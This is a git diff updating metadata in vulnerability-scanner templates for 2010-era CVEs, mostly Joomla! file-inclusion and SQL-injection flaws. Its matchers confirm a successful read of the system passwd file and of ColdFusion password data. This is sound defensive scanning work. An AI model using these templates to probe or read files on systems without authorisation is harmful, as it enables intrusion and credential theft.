4b0a00483046022100b90076e22d3f76df80214fba46f4e2ef240522cceac1703a54c3b1bb8f6f20d3022100c681528cdb823514b088010830a79a19204139cd1572343c0399dac62bd69870:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 4dba717936..807b55cc1b 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2680 info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14064 - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/ - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jesectionfinder + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450220694d0c7cd2db335a40a00adf906e77a793faed4e4cf8d9c24b09ca02fa5aed15022100e76f8582f20eae4635c28f52381965371a50ebb37d468f2e6c2124ae2284e069:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 806a5085e4..bd56ef2d37 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14017 - https://nvd.nist.gov/vuln/detail/CVE-2010-2682 - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - http://www.exploit-db.com/exploits/14017 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2682 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: realtyna + product: com_realtyna + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100f7a4497a5535c2a4561d91e2603fdabbad999145bbc89b5b2b27b183fb4e857d022100d80fdf4eeff6b88af1af1f3186c00dd25eb4211509a01a8830d84a9f5897c2e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 23e5b0c343..ae9cda7b24 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2857 info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14274 - https://nvd.nist.gov/vuln/detail/CVE-2010-2857 - - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/ - http://www.exploit-db.com/exploits/14274 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2857 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: danieljamesscott + product: com_music + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a0046304402203bd0d045d356f5f4514f749f45294c51396c3a3f65879cbae183d71b3998d62902202d85d9cca00d20f0391493ba570d76b1bf84ec7f7270db185a8b327a1f84a27c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 2c20cb936e..211d56f9dd 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -5,18 +5,25 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - http://securityreason.com/securityalert/8148 - remediation: Upgrade to a supported version. + - http://securityreason.com/securityalert/8137 + - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 + epss-score: 0.97351 + epss-percentile: 0.99861 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi @@ -27,16 +34,15 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "rdspassword=" - "encrypted=" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100ce70ff6dd8bebabac5d6e6eff5e239d389e92cb5a9e120055133c2095517e1e3022100e4a15fd06978ab83623a33fd6d52ca5472fec40b1dbabb0aa5ae9c3cc932a7c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 29b967f20d..088b9bf84d 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/31708 - https://nvd.nist.gov/vuln/detail/CVE-2010-2918 - - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - https://www.exploit-db.com/exploits/14476 - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/1925 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2918 cwe-id: CWE-94 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.02847 + epss-percentile: 0.89563 + cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: visocrea + product: com_joomla_visites + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a00463044022003ee4e6d94319cdc8ce89ce5f325da3683d26a0411dae0b7658b05c909225a20022042005cd531789797d90d211c202314b0dd8d2469ffeed401b21b561dcb0e90d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 7363d32efd..2ef23a6885 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -3,21 +3,27 @@ id: CVE-2010-2920 info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12120 - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.03527 + epss-percentile: 0.9051 + cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_foobla_suggestions + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a0047304502207a87ac0488ec8bc7e977ce76c80dee9d676aaec1f21b6a6ed7d20247c28ee7360221008dc3c79656751ee65676c0c3018039a8f34bef0cc140044ec999b9a56dcf54dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index cf5956b121..f1767b4a03 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -3,22 +3,27 @@ id: CVE-2010-3203 info: name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 - https://nvd.nist.gov/vuln/detail/CVE-2010-3203 - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/ - http://www.exploit-db.com/exploits/14845 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00626 + epss-percentile: 0.76642 + cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xmlswf + product: com_picsell + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a0046304402205b60db46ae518d345204bda9ad382ec6c0554df0fad7e91f02ed10744824a3b8022053e8678db404ce1c1e0144290b45d8572720210fcb09ebd7b9ebff4f1ecf8a07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 9388fb7c47..1142119a33 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14964 - https://nvd.nist.gov/vuln/detail/CVE-2010-3426 - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - http://www.exploit-db.com/exploits/14964 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-3426 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 + vendor: 4you-studio + product: com_jphone + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450221008647a9eeeb1cb48c2dbe7b38d30234d6e6d398056318c16eecd493c6713b944002205bf385c5a1619e1d94aad86d40d8749a11fecef094b0e1baba78a854bfcd1dbc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 984b345c3d..6820f977b3 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - http://www.exploit-db.com/exploits/15505/ - remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2010,iot,lfi,camera,edb + epss-score: 0.01615 + epss-percentile: 0.86059 + cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: camtron + product: cmnc-200_firmware + tags: cve,cve2010,iot,lfi,camera,edb http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100a8e47824e9b0f4e2bbe350cd7e4b4d88115c4a55683d36e5a800cd79b73765ee022100cd87b096ff4c18fad692e363ee3dbac7e8a856d74a8af98496c3528821becbf9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 295183549f..bd34dfa0c0 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -5,21 +5,27 @@ info: author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + remediation: | + Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - https://www.openwall.com/lists/oss-security/2010/11/22/9 - https://security-tracker.debian.org/tracker/CVE-2010-4239 - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 + - https://access.redhat.com/security/cve/cve-2010-4239 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* - epss-score: 0.00641 - tags: cve,cve2010,tikiwiki,lfi + epss-score: 0.03561 + epss-percentile: 0.90548 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: cve,cve2010,tikiwiki,lfi http: - method: GET @@ -35,4 +41,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/05/18 +# digest: 490a004630440220128dccc77ce1fb4f7d3f884416b0bbb36362b7d540259b83bddf63cd09ac770b02202bb6671fa257c8f0624f3c45451b33672450cca91b4952bc1b1ef740f73ae1f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index de2b9e26c1..e985c1058d 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 - remediation: Upgrade to a supported version. + - http://seclists.org/fulldisclosure/2010/Nov/326 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2010,lfi,joomla + epss-score: 0.01214 + epss-percentile: 0.83741 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450220276bd52298a058f6b94f0a6854e537ca1ac9a109aa73fedeab140ee3df2e6bcf022100b919e40627772c933e7166b0531630cfca7ecb9b68e1d5d3a8385af1b6c94ee5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 04c1e027dc..d24cd9a3cc 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -3,21 +3,27 @@ id: CVE-2010-4617 info: name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15791 - https://nvd.nist.gov/vuln/detail/CVE-2010-4617 - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-4617 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kanich + product: com_jotloader + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a0047304502200bb2568137bcb730c462a3cb278ccebf286b569b3cd815f452f87e3adec48d66022100e865b73e44ec1102b6709f1c7f8647cecf853ea36271fe22e427bf51f2727cc0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index b889847a47..644511b630 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15749 - https://nvd.nist.gov/vuln/detail/CVE-2010-4719 - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - http://www.exploit-db.com/exploits/15749 - remediation: Upgrade to a supported version. + - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4719 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + epss-percentile: 0.91527 + cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fxwebdesign + product: com_jradio + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a0047304502201aeeb10c9ba1025359a69471f3a91a0f4aee8a7d5a5d58186c744fe34b5e83380221008155988c8808e70bd5d1719b7f614feb8c7bd277857e2d579c65d7b33426141b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index a4abe18768..8ad13b1262 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -5,20 +5,23 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15585 - https://nvd.nist.gov/vuln/detail/CVE-2010-4769 - - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/ - - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00938 + epss-percentile: 0.81339 + cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: janguo + product: com_jimtawl + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a00473045022039fed62c72d2666671cb32055afaf448be089738800601d5df4fe8ce080e9f9b022100834091ec99c4970f864aa10dfa693e25db58b37becfc2eb38a2cc24815ea1607:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 4179ec8c65..758280703b 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34250 - https://nvd.nist.gov/vuln/detail/CVE-2010-4977 - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt - remediation: Upgrade to a supported version. + - http://securityreason.com/securityalert/8495 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.002 + epss-percentile: 0.57605 + cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: miniwork + product: com_canteen + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a00473045022100dc99abf5e10a4ba91af77f60735d2de646bd747eb690e1e9fbed656af460d36202204e270485334d36d006dfd8eb794f653ecc46a1ed1548e838e0c31f44b0482a4d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 99e7e54e09..69cf063b56 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/ - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0136 + epss-percentile: 0.84756 + cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jejob + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a00473045022100a6b256c99c159a6dab39a80ec5e7cedd002cc2d6694f884a2354e8b1d57f5771022059003e7e3d0bdebe161c99d8b9d0b993d3edf344060f5ddd142f3b10a793a855:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 0a54649658..20a1a49c30 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -3,21 +3,29 @@ id: CVE-2010-5278 info: name: MODx manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + remediation: | + Apply the latest patches and updates provided by MODx to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/34788 - https://nvd.nist.gov/vuln/detail/CVE-2010-5278 - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt - - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/ + - http://modxcms.com/forums/index.php/topic,55104.0.html + - http://modxcms.com/forums/index.php/topic,55105.msg317273.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N 